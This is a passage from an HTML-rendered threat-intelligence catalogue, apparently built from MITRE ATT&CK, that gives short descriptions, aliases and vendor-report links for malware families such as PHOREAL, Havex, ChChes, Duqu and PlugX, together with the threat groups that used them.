</table>
</div>
<div class="sect2">
<h3 id="_phoreal"><a class="anchor" href="#_phoreal"></a><a class="link" href="#_phoreal">PHOREAL</a></h3>
<div class="paragraph">
<p>PHOREAL is a signature backdoor used by APT32.[[Citation: FireEye APT32 May 2017]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1220. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0158">https://attack.mitre.org/wiki/Software/S0158</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html">https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_backdoor_oldrea"><a class="anchor" href="#_backdoor_oldrea"></a><a class="link" href="#_backdoor_oldrea">Backdoor.Oldrea</a></h3>
<div class="paragraph">
<p>Backdoor.Oldrea is a backdoor used by Dragonfly. It appears to be custom malware authored by the group or specifically for it.[[Citation: Symantec Dragonfly]]</p>
</div>
<div class="paragraph">
<p>Aliases: Backdoor.Oldrea, Havex</p>
</div>
<div class="paragraph">
<p>Backdoor.Oldrea is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Backdoor.Oldrea</p>
</li>
<li>
<p>Havex</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1221. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0093">https://attack.mitre.org/wiki/Software/S0093</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/Dragonfly%20Threat%20Against%20Western%20Energy%20Suppliers.pdf">http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/Dragonfly%20Threat%20Against%20Western%20Energy%20Suppliers.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_chches"><a class="anchor" href="#_chches"></a><a class="link" href="#_chches">ChChes</a></h3>
<div class="paragraph">
<p>ChChes is a Trojan that appears to be used exclusively by menuPass. It was used to target Japanese organizations in 2016. Its lack of persistence methods suggests it may be intended as a first-stage tool.[[Citation: Palo Alto menuPass Feb 2017]][[Citation: JPCERT ChChes Feb 2017]][[Citation: PWC Cloud Hopper Technical Annex April 2017]]</p>
</div>
<div class="paragraph">
<p>Aliases: ChChes, Scorpion, HAYMAKER</p>
</div>
<div class="paragraph">
<p>ChChes is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ChChes</p>
</li>
<li>
<p>Scorpion</p>
</li>
<li>
<p>HAYMAKER</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1222. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0144">https://attack.mitre.org/wiki/Software/S0144</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf">https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/">http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.jpcert.or.jp/2017/02/chches-malware&#8212;&#8203;93d6.html">http://blog.jpcert.or.jp/2017/02/chches-malware&#8212;&#8203;93d6.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hacking_team_uefi_rootkit"><a class="anchor" href="#_hacking_team_uefi_rootkit"></a><a class="link" href="#_hacking_team_uefi_rootkit">Hacking Team UEFI Rootkit</a></h3>
<div class="paragraph">
<p>Hacking Team UEFI Rootkit is a rootkit developed by the company Hacking Team as a method of persistence for remote access software.[[Citation: TrendMicro Hacking Team UEFI]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1223. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0047">https://attack.mitre.org/wiki/Software/S0047</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-uses-uefi-bios-rootkit-to-keep-rcs-9-agent-in-target-systems/">http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-uses-uefi-bios-rootkit-to-keep-rcs-9-agent-in-target-systems/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_halfbaked"><a class="anchor" href="#_halfbaked"></a><a class="link" href="#_halfbaked">HALFBAKED</a></h3>
<div class="paragraph">
<p>HALFBAKED is a malware family consisting of multiple components intended to establish persistence in victim networks.[[Citation: FireEye FIN7 April 2017]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1224. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0151">https://attack.mitre.org/wiki/Software/S0151</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html">https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_httpclient"><a class="anchor" href="#_httpclient"></a><a class="link" href="#_httpclient">httpclient</a></h3>
<div class="paragraph">
<p>httpclient is malware used by Putter Panda. It is a simple tool that provides a limited range of functionality, suggesting it is likely used as a second-stage or supplementary/backup tool.[[Citation: CrowdStrike Putter Panda]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1225. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0068">https://attack.mitre.org/wiki/Software/S0068</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf">http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_downdelph"><a class="anchor" href="#_downdelph"></a><a class="link" href="#_downdelph">Downdelph</a></h3>
<div class="paragraph">
<p>Downdelph is a first-stage downloader written in Delphi that has been used by APT28 in rare instances between 2013 and 2015.[[Citation: ESET Sednit Part 3]]</p>
</div>
<div class="paragraph">
<p>Aliases: Downdelph, Delphacy</p>
</div>
<div class="paragraph">
<p>Downdelph is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Downdelph</p>
</li>
<li>
<p>Delphacy</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1226. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0134">https://attack.mitre.org/wiki/Software/S0134</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf">http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_streamex"><a class="anchor" href="#_streamex"></a><a class="link" href="#_streamex">StreamEx</a></h3>
<div class="paragraph">
<p>StreamEx is a malware family that has been used by Deep Panda since at least 2015. In 2016, it was distributed via legitimate compromised Korean websites.[[Citation: Cylance Shell Crew Feb 2017]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1227. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0142">https://attack.mitre.org/wiki/Software/S0142</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar">https://www.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_psylo"><a class="anchor" href="#_psylo"></a><a class="link" href="#_psylo">Psylo</a></h3>
<div class="paragraph">
<p>Psylo is a shellcode-based Trojan that has been used by Scarlet Mimic. It has similar characteristics as FakeM.[[Citation: Scarlet Mimic Jan 2016]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1228. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0078">https://attack.mitre.org/wiki/Software/S0078</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/">http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hdoor"><a class="anchor" href="#_hdoor"></a><a class="link" href="#_hdoor">HDoor</a></h3>
<div class="paragraph">
<p>HDoor is malware that has been customized and used by the Naikon group.[[Citation: Baumgartner Naikon 2015]]</p>
</div>
<div class="paragraph">
<p>Aliases: HDoor, Custom HDoor</p>
</div>
<div class="paragraph">
<p>HDoor is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>HDoor</p>
</li>
<li>
<p>Custom HDoor</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1229. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0061">https://attack.mitre.org/wiki/Software/S0061</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf">https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_komplex"><a class="anchor" href="#_komplex"></a><a class="link" href="#_komplex">Komplex</a></h3>
<div class="paragraph">
<p>is a backdoor that has been used by APT28 on OS X and appears to be developed in a similar manner to XAgentOSX[[Citation: XAgentOSX]][[Citation: Sofacy Komplex Trojan]].</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1230. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0162">https://attack.mitre.org/wiki/Software/S0162</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/">https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/">https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tinyzbot"><a class="anchor" href="#_tinyzbot"></a><a class="link" href="#_tinyzbot">TinyZBot</a></h3>
<div class="paragraph">
<p>TinyZBot is a bot written in C# that was developed by Cleaver.[[Citation: Cylance Cleaver]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1231. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0004">https://attack.mitre.org/wiki/Software/S0004</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.cylance.com/assets/Cleaver/Cylance%20Operation%20Cleaver%20Report.pdf">http://www.cylance.com/assets/Cleaver/Cylance%20Operation%20Cleaver%20Report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_backspace"><a class="anchor" href="#_backspace"></a><a class="link" href="#_backspace">BACKSPACE</a></h3>
<div class="paragraph">
<p>BACKSPACE is a backdoor used by APT30 that dates back to at least 2005.[[Citation: FireEye APT30]]</p>
</div>
<div class="paragraph">
<p>Aliases: BACKSPACE, Lecna</p>
</div>
<div class="paragraph">
<p>BACKSPACE is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BACKSPACE</p>
</li>
<li>
<p>Lecna</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1232. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0031">https://attack.mitre.org/wiki/Software/S0031</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pinchduke"><a class="anchor" href="#_pinchduke"></a><a class="link" href="#_pinchduke">PinchDuke</a></h3>
<div class="paragraph">
<p>PinchDuke is malware that was used by APT29 from 2008 to 2010.[[Citation: F-Secure The Dukes]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1233. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0048">https://attack.mitre.org/wiki/Software/S0048</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cloudduke"><a class="anchor" href="#_cloudduke"></a><a class="link" href="#_cloudduke">CloudDuke</a></h3>
<div class="paragraph">
<p>CloudDuke is malware that was used by APT29 in 2015.[[Citation: F-Secure The Dukes]][[Citation: Securelist Minidionis July 2015]]</p>
</div>
<div class="paragraph">
<p>Aliases: CloudDuke, MiniDionis, CloudLook</p>
</div>
<div class="paragraph">
<p>CloudDuke is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CloudDuke</p>
</li>
<li>
<p>MiniDionis</p>
</li>
<li>
<p>CloudLook</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1234. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0054">https://attack.mitre.org/wiki/Software/S0054</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/71443/minidionis-one-more-apt-with-a-usage-of-cloud-drives/">https://securelist.com/blog/research/71443/minidionis-one-more-apt-with-a-usage-of-cloud-drives/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_winmm"><a class="anchor" href="#_winmm"></a><a class="link" href="#_winmm">WinMM</a></h3>
<div class="paragraph">
<p>WinMM is a full-featured, simple backdoor used by Naikon.[[Citation: Baumgartner Naikon 2015]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1235. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0059">https://attack.mitre.org/wiki/Software/S0059</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf">https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mobileorder"><a class="anchor" href="#_mobileorder"></a><a class="link" href="#_mobileorder">MobileOrder</a></h3>
<div class="paragraph">
<p>MobileOrder is a Trojan intended to compromise Android mobile devices. It has been used by Scarlet Mimic.[[Citation: Scarlet Mimic Jan 2016]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1236. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0079">https://attack.mitre.org/wiki/Software/S0079</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/">http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sys10"><a class="anchor" href="#_sys10"></a><a class="link" href="#_sys10">Sys10</a></h3>
<div class="paragraph">
<p>Sys10 is a backdoor that was used throughout 2013 by Naikon.[[Citation: Baumgartner Naikon 2015]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1237. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0060">https://attack.mitre.org/wiki/Software/S0060</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf">https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_duqu"><a class="anchor" href="#_duqu"></a><a class="link" href="#_duqu">Duqu</a></h3>
<div class="paragraph">
<p>Duqu is a malware platform that uses a modular approach to extend functionality after deployment within a target network.[[Citation: Symantec W32.Duqu]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1238. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0038">https://attack.mitre.org/wiki/Software/S0038</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/w32%20duqu%20the%20precursor%20to%20the%20next%20stuxnet.pdf">https://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/w32%20duqu%20the%20precursor%20to%20the%20next%20stuxnet.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakem"><a class="anchor" href="#_fakem"></a><a class="link" href="#_fakem">FakeM</a></h3>
<div class="paragraph">
<p>FakeM is a shellcode-based Windows backdoor that has been used by Scarlet Mimic.[[Citation: Scarlet Mimic Jan 2016]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1239. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0076">https://attack.mitre.org/wiki/Software/S0076</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/">http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_windshield"><a class="anchor" href="#_windshield"></a><a class="link" href="#_windshield">WINDSHIELD</a></h3>
<div class="paragraph">
<p>WINDSHIELD is a signature backdoor used by APT32.[[Citation: FireEye APT32 May 2017]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1240. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0155">https://attack.mitre.org/wiki/Software/S0155</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html">https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shipshape"><a class="anchor" href="#_shipshape"></a><a class="link" href="#_shipshape">SHIPSHAPE</a></h3>
<div class="paragraph">
<p>SHIPSHAPE is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps.[[Citation: FireEye APT30]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1241. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0028">https://attack.mitre.org/wiki/Software/S0028</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_t9000"><a class="anchor" href="#_t9000"></a><a class="link" href="#_t9000">T9000</a></h3>
<div class="paragraph">
<p>T9000 is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. It has been used in multiple targeted attacks against U.S.-based organizations.[[Citation: FireEye admin@338 March 2014]][[Citation: Palo Alto T9000 Feb 2016]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1242. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0098">https://attack.mitre.org/wiki/Software/S0098</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/">http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html">https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bs2005"><a class="anchor" href="#_bs2005"></a><a class="link" href="#_bs2005">BS2005</a></h3>
<div class="paragraph">
<p>BS2005 is malware that was used by Ke3chang in spearphishing campaigns since at least 2011.[[Citation: Villeneuve et al 2014]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1243. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0014">https://attack.mitre.org/wiki/Software/S0014</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_webc2"><a class="anchor" href="#_webc2"></a><a class="link" href="#_webc2">WEBC2</a></h3>
<div class="paragraph">
<p>WEBC2 is a backdoor used by APT1 to retrieve a Web page from a predetermined C2 server.[[Citation: Mandiant APT1 Appendix]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1244. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0109">https://attack.mitre.org/wiki/Software/S0109</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_plugx"><a class="anchor" href="#_plugx"></a><a class="link" href="#_plugx">PlugX</a></h3>
<div class="paragraph">
<p>PlugX is a remote access tool (RAT) that uses modular plugins.[[Citation: Lastline PlugX Analysis]] It has been used by multiple threat groups.[[Citation: FireEye Clandestine Fox Part 2]][[Citation: New DragonOK]][[Citation: Dell TG-3390]]</p>
</div>
<div class="paragraph">
<p>Aliases: PlugX, Sogu, Kaba</p>
</div>
<div class="paragraph">
<p>PlugX is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PlugX</p>
</li>
<li>
<p>Sogu</p>
</li>
<li>
<p>Kaba</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1245. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
